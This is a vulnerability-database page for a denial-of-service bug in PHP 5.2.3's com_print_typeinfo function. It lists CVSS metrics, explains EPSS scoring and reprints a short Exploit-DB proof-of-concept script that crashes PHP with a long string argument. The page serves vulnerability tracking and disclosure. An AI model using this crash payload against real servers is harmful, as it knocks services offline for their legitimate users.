Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The com_print_typeinfo function in the bz2 extension in PHP 5.2.3 allows context-dependent attackers to cause a denial of service via a long argument.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5.8 | AV:N/AC:M/Au:N/C:N/I:P/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4175
Publication date : 2007-07-11 22h00 +00:00
Author : shinnai
EDB Verified : Yes
<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp sp2, worked both from the cli and on apache
//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar
if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}
$buff = str_repeat("a",1000);
com_print_typeinfo($buff);
?>
# milw0rm.com [2007-07-12]
Products Mentioned
Configuraton 0
Php>>Php >> Version 5.2.3
- Php>>Php >> Version 5.2.3 (Open CPE detail)
- Php>>Php >> Version 5.2.3 (Open CPE detail)
- Php>>Php >> Version 5.2.3 (Open CPE detail)
References
2025©
tesweb SA
